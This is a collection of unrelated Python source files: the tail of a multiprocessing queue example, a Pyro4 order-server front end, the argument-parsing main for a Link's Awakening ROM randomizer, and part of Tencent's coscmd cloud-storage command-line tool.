print('Process to read: %s' % os.getpid())
while True:
value = q.get(True)
print('Get %s from queue.' % value)
if __name__=='__main__':
# 父进程创建Queue,并传给各个子进程:
q = Queue()
pw = Process(target=write, args=(q,))
pr = Process(target=read, args=(q,))
# 启动子进程pw,写入:
pw.start()
# 启动子进程pr,读取:
pr.start()
# 等待pw结束:
pw.join()
# pr进程里是死循环,无法等待其结束,只能强行终止:
pr.terminate()
|
frontend.py
|
#!/usr/bin/python3
""" User Client """
import json
import socketserver
import sys
import threading
import Pyro4
# TODO: work out what is throwing errors
# TODO: get server polling code to change server status if there is an outage.
import order_server
from Pyro4.errors import CommunicationError, PyroError
class FrontEnd(object):
def __init__(self):
ns = Pyro4.locateNS()
self.server_uris = [ns.lookup("OrderManager1"), ns.lookup("OrderManager2"), ns.lookup("OrderManager3")]
serverlist = []
for uri in self.server_uris:
serverlist.append(Pyro4.Proxy(uri))
# update server lists
for s in serverlist:
try:
s.set_servers(self.server_uris)
except PyroError:
pass # ignore the error
print(self.server_uris)
def __get_order_server(self):
primary_server = True
for server in self.server_uris:
try:
actual_server = Pyro4.Proxy(server)
actual_server.set_primary_state(primary_server)
primary_server = False
return actual_server
except ConnectionRefusedError:
pass
except CommunicationError:
pass
except PyroError:
pass
return None # todo throw No Remaining Servers exception
def process_command(self, data):
print("Frontend data: ", data)
command = data['action']
userid = data['userid']
input = data['data']
if not userid:
return "No USERID specified"
if command == "ADD":
print("Running Action Frontend")
items_to_order = input.split(',')
if len(items_to_order) > 3 or len(items_to_order) == 0:
return "Must enter at least 1 item, and no more than 3."
# deal with batch stuff, to
results = self.__get_order_server().place_order(userid, items_to_order)
# todo check length to make sure a server is online.
return str(results)
elif command == "DELETE":
print("running delete front end")
del_index = input
results = self.__get_order_server().cancel_order(userid, del_index)
# todo check results to ensure things are fine :D
return str(results)
elif command == "HISTORY":
print("Running History frontend")
results = self.__get_order_server().get_order_history(userid)
print("Frontend results: ", results)
# todo remove batch processing for this (no CUD needed, only R).
return str(results)
else:
return "Command not found. Please try again"
class MyServer(socketserver.BaseRequestHandler):
def handle(self):
server = FrontEnd()
data = self.request.recv(1024).strip()
data = data.decode()
data_dict = json.loads(data)
res = server.process_command(data_dict)
# server log now
print("Frontend: ", res)
response = res.encode()
print("Frontend encoded: ", response)
self.request.sendall(response)
def main(host, port):
# for i in range(1, 4):
# t = threading.Thread(target=order_server.main, args=[i])
# t.daemon = True
# t.start()
server = socketserver.TCPServer((host, port), MyServer)
server.serve_forever()
if __name__ == "__main__":
print("Arguments frontend: ", sys.argv)
hostname = sys.argv[1]
portnum = int(sys.argv[2])
main(hostname, portnum)
|
main.py
|
import binascii
from romTables import ROMWithTables
import shlex
import randomizer
import logic
import patches.dungeonEntrances
import explorer
import spoilerLog
def main(mainargs=None):
import argparse
import sys
parser = argparse.ArgumentParser(description='Randomize!')
parser.add_argument('input_filename', metavar='input rom', type=str,
help="Rom file to use as input.")
parser.add_argument('-o', '--output', dest="output_filename", metavar='output rom', type=str, required=False,
help="Output filename to use. If not specified [seed].gbc is used.")
parser.add_argument('--dump', dest="dump", action="store_true",
help="Dump the logic of the given rom (spoilers!)")
parser.add_argument('--spoilerformat', dest="spoilerformat", choices=["none", "console", "text", "json"], default="none",
help="Sets the output format for the generated seed's spoiler log")
parser.add_argument('--spoilerfilename', dest="spoiler_filename", type=str, required=False,
help="Output filename to use for the spoiler log. If not specified, LADXR_[seed].txt/json is used.")
parser.add_argument('--test', dest="test", action="store_true",
help="Test the logic of the given rom, without showing anything.")
parser.add_argument('-s', '--seed', dest="seed", type=str, required=False,
help="Generate the specified seed")
parser.add_argument('--romdebugmode', dest="romdebugmode", action="store_true",
help="Patch the rom so that debug mode is enabled, this creates a default save with most items and unlocks some debug features.")
parser.add_argument('--exportmap', dest="exportmap", action="store_true",
help="Export the map (many graphical mistakes)")
parser.add_argument('--emptyplan', dest="emptyplan", type=str, required=False,
help="Write an unfilled plan file")
parser.add_argument('--timeout', type=float, required=False,
help="Timeout generating the seed after the specified number of seconds")
# Flags that effect gameplay
parser.add_argument('--plan', dest="plan", metavar='plandomizer', type=str, required=False,
help="Read an item placement plan")
parser.add_argument('--race', dest="race", nargs="?", default=False, const=True,
help="Enable race mode. This generates a rom from which the spoiler log cannot be dumped and the seed cannot be extracted.")
parser.add_argument('--logic', dest="logic", choices=["normal", "hard", "glitched", "hell"],
help="Which level of logic is required.")
parser.add_argument('--multiworld', dest="multiworld", type=int, required=False,
help="Generates multiple roms for a multiworld setup.")
parser.add_argument('--multiworld-config', dest="multiworld_config", action="append", required=False,
help="Set configuration for a multiworld player, supply multiple times for settings per player")
parser.add_argument('--forwardfactor', dest="forwardfactor", type=float, required=False,
help="Forward item weight adjustment factor, lower values generate more rear heavy seeds while higher values generate front heavy seeds. Default is 0.5.")
parser.add_argument('--heartpiece', dest="heartpiece", action="store_true",
help="Enables randomization of heart pieces.")
parser.add_argument('--seashells', dest="seashells", action="store_true",
help="Enables seashells mode, which randomizes the secret sea shells hiding in the ground/trees. (chest are always randomized)")
parser.add_argument('--heartcontainers', dest="heartcontainers", action="store_true",
help="Enables heartcontainer mode, which randomizes the heart containers dropped by bosses.")
parser.add_argument('--instruments', dest="instruments", action="store_true",
help="Shuffle the instruments in the item pool.")
parser.add_argument('--owlstatues', dest="owlstatues", choices=['none', 'dungeon', 'overworld', 'both'], default='none',
help="Give the owl statues in dungeons or on the overworld items as well, instead of showing the normal hints")
parser.add_argument('--keysanity', dest="keysanity", action="store_true",
help="Enables keysanity mode, which shuffles all dungeon items outside dungeons as well.")
parser.add_argument('--randomstartlocation', dest="randomstartlocation", action="store_true",
help="Place your starting house at a random location.")
parser.add_argument('--dungeonshuffle', dest="dungeonshuffle", action="store_true",
help="Enable dungeon shuffle, puts dungeons on different spots.")
parser.add_argument('--boss', dest="boss", choices=["default", "shuffle", "random"], default="default",
help="Enable boss shuffle, swaps around dungeon bosses.")
parser.add_argument('--miniboss', dest="miniboss", choices=["default", "shuffle", "random"], default="default",
help="Shuffle the minibosses or just randomize them.")
parser.add_argument('--witch', dest="witch", action="store_true",
help="Enables witch and toadstool in the item pool.")
parser.add_argument('--hpmode', dest="hpmode", choices=['default', 'inverted', '1'], default='default',
help="Set the HP gamplay mode. Inverted causes health containers to take HP instead of give it and you start with more health. 1 sets your starting health to just 1 hearth.")
parser.add_argument('--boomerang', dest="boomerang", choices=['default', 'trade', 'gift'], default='default',
help="Put the boomerang and the trade with the boomerang in the item pool")
parser.add_argument('--steal', dest="steal", choices=['never', 'always', 'default'], default='always',
help="Configure when to allow stealing from the shop.")
parser.add_argument('--hard-mode', dest="hardMode", action="store_true",
help="Make the game a bit harder, less health from drops, bombs damage yourself, and less iframes.")
parser.add_argument('--goal', dest="goal", choices=['-1', '0', '1', '2', '3', '4', '5', '6', '7', '8', 'random', 'raft', 'seashells'], default='8',
help="Configure the instrument goal for this rom, anything between 0 and 8.")
parser.add_argument('--accessibility', dest="accessibility_rule", choices=['all', 'goal'],
help="Switches between making sure all locations are reachable or only the goal is reachable")
parser.add_argument('--bowwow', dest="bowwow", choices=['normal', 'always', 'swordless'], default='normal',
help="Enables 'good boy mode', where BowWow is allowed on all screens and can damage bosses and more enemies.")
parser.add_argument('--pool', dest="itempool", choices=['normal', 'casual', 'pain', 'keyup'], default='normal',
help="Sets up different item pools, for easier or harder gameplay.")
parser.add_argument('--overworld', dest="overworld", choices=['normal', 'dungeondive'], default='normal')
# Just aestetic flags
parser.add_argument('--gfxmod', dest="gfxmod", action='append',
help="Load graphical mods.")
parser.add_argument('--quickswap', dest="quickswap", choices=['none', 'a', 'b'], default='none',
help="Configure quickswap for A or B button (select key swaps, no longer opens map)")
parser.add_argument('--textmode', dest="textmode", choices=['default', 'fast', 'none'], default='default',
help="Default just keeps text normal, fast makes text appear twice as fast, and none removes all text from the game.")
parser.add_argument('--nag-messages', dest="removeNagMessages", action="store_false",
help="Enable the nag messages on touching stones and crystals. By default they are removed.")
parser.add_argument('--lowhpbeep', dest="lowhpbeep", choices=['default', 'slow', 'none'], default='slow',
help="Slows or disables the low health beeping sound")
parser.add_argument('--linkspalette', dest="linkspalette", type=int, default=None,
help="Force the palette of link")
args = parser.parse_args(mainargs)
if args.multiworld is not None:
args.multiworld_options = [args] * args.multiworld
if args.multiworld_config is not None:
for index, settings_string in enumerate(args.multiworld_config):
args.multiworld_options[index] = parser.parse_args([args.input_filename] + shlex.split(settings_string))
if args.timeout is not None:
import threading
import time
import os
def timeoutFunction():
time.sleep(args.timeout)
print("TIMEOUT")
sys.stdout.flush()
os._exit(1)
threading.Thread(target=timeoutFunction, daemon=True).start()
if args.exportmap:
import mapexport
print("Loading: %s" % (args.input_filename))
rom = ROMWithTables(args.input_filename)
mapexport.MapExport(rom)
sys.exit(0)
if args.emptyplan:
import locations.items
import logic
f = open(args.emptyplan, "wt")
f.write(";Plandomizer data\n;Items: %s\n" % (", ".join(map(lambda n: getattr(locations.items, n), filter(lambda n: not n.startswith("__"), dir(locations.items))))))
f.write(";Modify the item pool:\n")
f.write(";Pool:SWORD:+5\n")
f.write(";Pool:RUPEES_50:-5\n")
iteminfo_list = logic.Logic(args, start_house_index=0, entranceMapping=list(range(9)), bossMapping=list(range(9))).iteminfo_list
for ii in sorted(iteminfo_list, key=lambda n: (n.location.dungeon if n.location.dungeon else -1, repr(n.metadata))):
if len(ii.OPTIONS) > 1:
f.write(";%r\n" % (ii.metadata))
f.write("Location:%s: \n" % (ii.nameId))
sys.exit(0)
if args.dump or args.test:
print("Loading: %s" % (args.input_filename))
rom = ROMWithTables(args.input_filename)
if args.spoilerformat == "none":
args.spoilerformat = "console"
try:
log = spoilerLog.SpoilerLog(args, rom)
log.output(args.spoiler_filename)
sys.exit(0)
except spoilerLog.RaceRomException:
print("Cannot read spoiler log for race rom")
sys.exit(1)
if args.seed:
try:
args.seed = binascii.unhexlify(args.seed)
except binascii.Error:
args.seed = args.seed.encode("ascii")
retry_count = 0
while True:
try:
r = randomizer.Randomizer(args, seed=args.seed)
seed = binascii.hexlify(r.seed).decode("ascii").upper()
break
except randomizer.Error:
if args.seed is not None:
print("Specified seed does not produce a valid result.")
sys.exit(1)
retry_count += 1
if retry_count > 100:
print("Randomization keeps failing, abort!")
sys.exit(1)
print("Failed, trying again: %d" % (retry_count))
print("Seed: %s" % (seed))
if __name__ == "__main__":
main()
|
cos_cmd.py
|
# -*- coding: utf-8 -*-
from six.moves.configparser import SafeConfigParser
from six import text_type
from argparse import ArgumentParser
from logging.handlers import RotatingFileHandler
import sys
import logging
import os
import json
import requests
import qcloud_cos
from threading import Thread
from coscmd import cos_global
if sys.version > '3':
from coscmd.cos_client import CoscmdConfig, CosS3Client
from coscmd.cos_global import Version
else:
from cos_client import CoscmdConfig, CosS3Client
from cos_global import Version
logger = logging.getLogger("coscmd")
fs_coding = sys.getfilesystemencoding()
pre_appid = ""
pre_bucket = ""
config_path = ""
silence = False
global res
def concat_path(sorce_path, target_path):
sorce_path = sorce_path.replace('\\', '/')
target_path = target_path.replace('\\', '/')
if sorce_path.endswith('/') is False:
if target_path.endswith('/') is True:
target_path += sorce_path.split('/')[-1]
return sorce_path, target_path
def to_printable_str(s):
if isinstance(s, text_type):
return s.encode(fs_coding)
else:
return s
def config(args):
logger.debug("config: " + str(args))
conf_path = os.path.expanduser(config_path)
with open(conf_path, 'w+') as f:
cp = SafeConfigParser()
cp.add_section("common")
cp.set('common', 'secret_id', args.secret_id)
cp.set('common', 'secret_key', args.secret_key)
if args.token != "":
cp.set('common', 'token', args.token)
cp.set('common', 'bucket', args.bucket)
if args.endpoint:
cp.set('common', 'endpoint', args.endpoint)
else:
cp.set('common', 'region', args.region)
cp.set('common', 'max_thread', str(args.max_thread))
cp.set('common', 'part_size', str(args.part_size))
cp.set('common', 'retry', str(args.retry))
cp.set('common', 'timeout', str(args.timeout))
if args.appid != "":
cp.set('common', 'appid', args.appid)
if args.use_http:
cp.set('common', 'schema', 'http')
else:
cp.set('common', 'schema', 'https')
cp.set('common', 'verify', args.verify)
if args.anonymous:
cp.set('common', 'anonymous', 'True')
else:
cp.set('common', 'anonymous', 'False')
cp.write(f)
logger.info("Created configuration file in {path}".format(path=to_printable_str(conf_path)))
def compatible(region):
if region is None:
return None
_dict = {'tj': 'ap-beijing-1', 'bj': 'ap-beijing', 'gz': 'ap-guangzhou', 'sh': 'ap-shanghai',
'cd': 'ap-chengdu', 'spg': 'ap-singapore', 'hk': 'ap-hongkong', 'ca': 'na-toronto', 'ger': 'eu-frankfurt',
'cn-south': 'ap-guangzhou', 'cn-north': 'ap-beijing-1'}
if region.startswith('cos.'):
region = region[4:]
if region in _dict:
region = _dict[region]
return region
def load_conf():
conf_path = os.path.expanduser(config_path)
if not os.path.exists(conf_path):
logger.warn("{conf} couldn't be found, please use \'coscmd config -h\' to learn how to config coscmd!".format(conf=to_printable_str(conf_path)))
raise IOError
else:
logger.debug('{conf} is found'.format(conf=to_printable_str(conf_path)))
try:
with open(conf_path, 'r') as f:
cp = SafeConfigParser()
cp.readfp(fp=f)
if not cp.has_section('common'):
raise Exception("[common] section could't be found, please check your config file.")
if cp.has_option('common', 'part_size'):
part_size = cp.getint('common', 'part_size')
else:
part_size = 1
if cp.has_option('common', 'max_thread'):
max_thread = cp.getint('common', 'max_thread')
else:
max_thread = 5
try:
secret_id = cp.get('common', 'secret_id')
except Exception:
secret_id = cp.get('common', 'access_id')
try:
appid = cp.get('common', 'appid')
bucket = cp.get('common', 'bucket')
if bucket.endswith("-"+str(appid)):
bucket = bucket.rstrip(appid)
bucket = bucket[:-1]
except Exception:
try:
bucket = cp.get('common', 'bucket')
appid = bucket.split('-')[-1]
bucket = bucket.rstrip(appid)
bucket = bucket[:-1]
except Exception:
# check if user use -b bucket
if (pre_bucket == ""):
logger.error("The configuration file is wrong. Please reconfirm")
try:
schema = cp.get('common', 'schema')
except Exception:
schema = 'https'
try:
verify = cp.get('common', 'verify')
except Exception:
verify = 'md5'
try:
token = cp.get('common', 'token')
except Exception:
token = None
try:
anonymous = cp.get('common', 'anonymous')
if anonymous == 'True' or anonymous == 'true':
anonymous = True
else:
anonymous = False
except Exception:
anonymous = False
try:
retry = int(cp.get('common', 'retry'))
except Exception:
retry = 2
try:
timeout = int(cp.get('common', 'timeout'))
except Exception:
timeout = 60
region, endpoint = None, None
if cp.has_option('common', 'region'):
region = cp.get('common', 'region')
if cp.has_option('common', 'endpoint'):
endpoint = cp.get('common', 'endpoint')
if pre_appid != "":
appid = pre_appid
if pre_bucket != "":
bucket = pre_bucket
if pre_region != "":
region = pre_region
conf = CoscmdConfig(
appid=appid,
secret_id=secret_id,
secret_key=cp.get('common', 'secret_key'),
token=token,
region=compatible(region),
endpoint=endpoint,
bucket=bucket,
part_size=part_size,
max_thread=max_thread,
schema=schema,
anonymous=anonymous,
verify=verify,
retry=retry,
timeout=timeout,
silence=silence
)
return conf
except Exception as e:
raise(e)
class Op(object):
@staticmethod
def upload(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if args.cos_path == "":
args.cos_path = "/"
Interface = client.op_int()
if not isinstance(args.local_path, text_type):
args.local_path = args.local_path.decode(fs_coding)
if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
if not os.path.exists(args.local_path):
logger.warn("cannot stat '%s': No such file or directory" % to_printable_str(args.local_path))
return -1
if not os.access(args.local_path, os.R_OK):
logger.warn('local_path %s is not readable!' % to_printable_str(args.local_path))
return -1
args.local_path, args.cos_path = concat_path(args.local_path, args.cos_path)
if args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
kwargs = {}
kwargs['sync'] = args.sync
kwargs['skipmd5'] = args.skipmd5
kwargs['ignore'] = args.ignore.split(',')
kwargs['include'] = args.include.split(',')
kwargs['force'] = args.force
kwargs['delete'] = args.delete
kwargs['yes'] = args.yes
if args.recursive:
if os.path.isfile(args.local_path) is True:
rt = Interface.upload_file(args.local_path, args.cos_path, args.headers, **kwargs)
return rt
elif os.path.isdir(args.local_path):
rt = Interface.upload_folder(args.local_path, args.cos_path, args.headers, **kwargs)
return rt
else:
if os.path.isdir(args.local_path):
logger.warn("\"{path}\" is a directory, use \'-r\' option to upload it please".format(path=to_printable_str(args.local_path)))
return -1
if os.path.isfile(args.local_path) is False:
logger.warn("cannot stat '%s': No such file or directory" % to_printable_str(args.local_path))
return -1
rt = Interface.upload_file(args.local_path, args.cos_path, args.headers, **kwargs)
return rt
return -1
except Exception as e:
logger.wran(e)
return -2
@staticmethod
def download(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
if not isinstance(args.local_path, text_type):
args.local_path = args.local_path.decode(fs_coding)
if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
args.cos_path, args.local_path = concat_path(args.cos_path, args.local_path)
if args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
kwargs = {}
kwargs['force'] = args.force
kwargs['sync'] = args.sync
kwargs['num'] = min(20, args.num)
kwargs['ignore'] = args.ignore.split(',')
kwargs['include'] = args.include.split(',')
kwargs['skipmd5'] = args.skipmd5
kwargs['delete'] = args.delete
kwargs['yes'] = args.yes
if args.recursive:
rt = Interface.download_folder(args.cos_path, args.local_path, args.headers, **kwargs)
return rt
else:
rt = Interface.download_file(args.cos_path, args.local_path, args.headers, **kwargs)
return rt
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def delete(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
Interface = client.op_int()
if not isinstance(args. cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
kwargs = {}
kwargs['force'] = args.force
kwargs['versions'] = args.versions
kwargs['versionId'] = args.versionId
kwargs['yes'] = args.yes
if args.recursive:
if args.cos_path.endswith('/') is False:
args.cos_path += '/'
if args.cos_path == '/':
args.cos_path = ''
if not Interface.delete_folder(args.cos_path, **kwargs):
logger.debug("delete all files under {cos_path} successfully!".format(cos_path=to_printable_str(args.cos_path)))
return 0
else:
logger.debug("delete all files under {cos_path} failed!".format(cos_path=to_printable_str(args.cos_path)))
return -1
else:
if args.cos_path == '':
logger.warn("not support delete empty path")
return -1
if not Interface.delete_file(args.cos_path, **kwargs):
logger.debug("delete all files under {cos_path} successfully!".format(cos_path=to_printable_str(args.cos_path)))
return 0
else:
logger.debug("delete all files under {cos_path} failed!".format(cos_path=to_printable_str(args.cos_path)))
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def copy(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
_, args.cos_path = concat_path(args.source_path, args.cos_path)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not isinstance(args.source_path, text_type):
args.source_path = args.source_path.decode(fs_coding)
if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
kwargs = {}
kwargs['sync'] = args.sync
kwargs['force'] = args.force
kwargs['directive'] = args.directive
kwargs['skipmd5'] = args.skipmd5
kwargs['ignore'] = args.ignore.split(',')
kwargs['include'] = args.include.split(',')
kwargs['delete'] = args.delete
kwargs['yes'] = args.yes
kwargs['move'] = False
if args.recursive:
_, args.cos_path = concat_path(args.source_path, args.cos_path)
if args.cos_path.endswith('/') is False:
args.cos_path += '/'
if args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not Interface.copy_folder(args.source_path, args.cos_path, args.headers, **kwargs):
return 0
else:
return 1
else:
if not Interface.copy_file(args.source_path, args.cos_path, args.headers, **kwargs):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def move(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
_, args.cos_path = concat_path(args.source_path, args.cos_path)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not isinstance(args.source_path, text_type):
args.source_path = args.source_path.decode(fs_coding)
if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
kwargs = {}
kwargs['sync'] = False
kwargs['force'] = True
kwargs['directive'] = args.directive
kwargs['skipmd5'] = True
kwargs['ignore'] = args.ignore.split(',')
kwargs['include'] = args.include.split(',')
kwargs['delete'] = False
kwargs['move'] = True
if args.recursive:
_, args.cos_path = concat_path(args.source_path, args.cos_path)
if args.cos_path.endswith('/') is False:
args.cos_path += '/'
if args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not Interface.copy_folder(args.source_path, args.cos_path, args.headers, **kwargs):
return 0
else:
return 1
else:
if not Interface.copy_file(args.source_path, args.cos_path, args.headers, **kwargs):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def list(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not isinstance(args. cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
Interface = client.op_int()
kwargs = {}
kwargs['recursive'] = args.recursive
kwargs['all'] = args.all
kwargs['num'] = args.num
kwargs['human'] = args.human
kwargs['versions'] = args.versions
if not Interface.list_objects(cos_path=args.cos_path, **kwargs):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def list_parts(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
if Interface.list_multipart_uploads(cos_path=args.cos_path):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def abort(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not isinstance(args. cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
Interface = client.op_int()
if not Interface.abort_parts(cos_path=args.cos_path):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def info(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not isinstance(args. cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
Interface = client.op_int()
if not Interface.info_object(args.cos_path, _human=args.human):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def restore(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not isinstance(args. cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
Interface = client.op_int()
kwargs = {}
kwargs['day'] = args.day
kwargs['tier'] = args.tier
if args.recursive:
if not Interface.restore_folder(cos_path=args.cos_path, **kwargs):
return 0
else:
return -1
else:
if not Interface.restore_file(cos_path=args.cos_path, **kwargs):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def signurl(args):
try:
conf = load_conf()
client = CosS3Client(conf)
if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
try:
Interface = client.op_int()
rt = Interface.sign_url(args.cos_path, args.timeout)
if rt:
return 0
else:
return -1
except Exception:
logger.warn('Geturl fail')
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def put_object_acl(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not isinstance(args. cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
Interface = client.op_int()
rt = Interface.put_object_acl(args.grant_read, args.grant_write, args.grant_full_control, args.cos_path)
if rt is True:
return 0
else:
logger.warn("Put object acl fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def get_object_acl(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not isinstance(args. cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
Interface = client.op_int()
rt = Interface.get_object_acl(args.cos_path)
if rt is True:
return 0
else:
logger.warn("Get object acl fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def create_bucket(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
if Interface.create_bucket():
return 0
else:
logger.warn("Create bucket fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def delete_bucket(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
kwargs = {}
kwargs['force'] = args.force
if Interface.delete_bucket(**kwargs):
return 0
else:
logger.warn("Delete bucket fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def put_bucket_acl(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
rt = Interface.put_bucket_acl(args.grant_read, args.grant_write, args.grant_full_control)
if rt is True:
return 0
else:
logger.warn("put bucket acl fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def get_bucket_acl(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
rt = Interface.get_bucket_acl()
if rt is True:
return 0
else:
logger.warn("Get bucket acl fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def put_bucket_versioning(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
rt = Interface.put_bucket_versioning(args.status)
if rt is True:
return 0
else:
logger.warn("Put bucket versioning fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def get_bucket_versioning(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
rt = Interface.get_bucket_versioning()
if rt is True:
return 0
else:
logger.warn("Get bucket versioning fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def probe(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
kwargs = {}
kwargs['test_num'] = args.num
kwargs['file_size'] = args.size
rt = Interface.probe(**kwargs)
if 0 == rt:
return 0
else:
logger.warn("probe failed")
return -1
except Exception as e:
logger.warn(e)
return -2
def get_version():
logger.info(Version)
return 0
def version_check():
try:
ret = requests.get("https://pypi.org/pypi/coscmd/json").content
res_json = json.loads(ret)
latest_version = res_json["info"]["version"]
lat_spl = latest_version.split('.')
cur_spl = cos_global.Version.split('.')
if cur_spl[0] < lat_spl[0] or cur_spl[1] < lat_spl[1] or cur_spl[2] < lat_spl[2]:
logger.info("The current version of coscmd is {v1} \
and the latest version is {v2}. It is recommended \
to upgrade coscmd with the command'pip install coscmd -U'.".format(v1=cos_global.Version, v2=latest_version))
except Exception as e:
logger.debug(e)
def command_thread():
global res
res = -1
desc = """an easy-to-use but powerful command-line tool.
try \'coscmd -h\' to get more informations.
try \'coscmd sub-command -h\' to learn all command usage, likes \'coscmd upload -h\'"""
parser = ArgumentParser(description=desc)
parser.add_argument('-d', '--debug', help="Debug mode", action="store_true", default=False)
parser.add_argument('-s', '--silence', help="Silence mode", action="store_true", default=False)
parser.add_argument('-b', '--bucket', help="Specify bucket", type=str, default="")
parser.add_argument('-r', '--region', help="Specify region", type=str, default="")
parser.add_argument('-c', '--config_path', help="Specify config_path", type=str, default="~/.cos.conf")
parser.add_argument('-l', '--log_path', help="Specify log_path", type=str, default="~/.cos.log")
parser.add_argument('--log_size', help='specify max log size in MB (default 1MB)', type=int, default=128)
parser.add_argument('--log_backup_count', help='specify log backup num', type=int, default=1)
sub_parser = parser.add_subparsers()
parser_config = sub_parser.add_parser("config", help="Config your information at first")
parser_config.add_argument('-a', '--secret_id', help='Specify your secret id', type=str, required=True)
parser_config.add_argument('-s', '--secret_key', help='Specify your secret key', type=str, required=True)
parser_config.add_argument('-t', '--token', help='Set x-cos-security-token header', type=str, default="")
parser_config.add_argument('-b', '--bucket', help='Specify your bucket', type=str, required=True)
group = parser_config.add_mutually_exclusive_group(required=True)
group.add_argument('-r', '--region', help='Specify your region', type=str)
group.add_argument('-e', '--endpoint', help='Specify COS endpoint', type=str)
parser_config.add_argument('-m', '--max_thread', help='Specify the number of threads (default 5)', type=int, default=5)
parser_config.add_argument('-p', '--part_size', help='specify min part size in MB (default 1MB)', type=int, default=1)
parser_config.add_argument('--retry', help='specify retry times', type=int, default=5)
parser_config.add_argument('--timeout', help='specify request timeout', type=int, default=60)
parser_config.add_argument('-u', '--appid', help='Specify your appid', type=str, default="")
parser_config.add_argument('--verify', help='Specify your encryption method', type=str, default="md5")
parser_config.add_argument('--do-not-use-ssl', help="Use http://", action="store_true", default=False, dest="use_http")
parser_config.add_argument('--anonymous', help="Anonymous operation", action="store_true", default=False, dest="anonymous")
parser_config.set_defaults(func=config)
parser_upload = sub_parser.add_parser("upload", help="Upload file or directory to COS")
parser_upload.add_argument('local_path', help="Local file path as /tmp/a.txt or directory", type=str)
parser_upload.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_upload.add_argument('-r', '--recursive', help="Upload recursively when upload directory", action="store_true", default=False)
parser_upload.add_argument('-H', '--headers', help="Specify HTTP headers", type=str, default='{}')
parser_upload.add_argument('-s', '--sync', help="Upload and skip the same file", action="store_true", default=False)
parser_upload.add_argument('-f', '--force', help="upload without history breakpoint", action="store_true", default=False)
parser_upload.add_argument('-y', '--yes', help="Skip confirmation", action="store_true", default=False)
parser_upload.add_argument('--include', help='Specify filter rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="*")
parser_upload.add_argument('--ignore', help='Specify ignored rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="")
parser_upload.add_argument('--skipmd5', help='Upload without x-cos-meta-md5 / sync without check md5, only check filename and filesize', action="store_true", default=False)
parser_upload.add_argument('--delete', help="delete objects which exists in cos but not exist in local", action="store_true", default=False)
parser_upload.set_defaults(func=Op.upload)
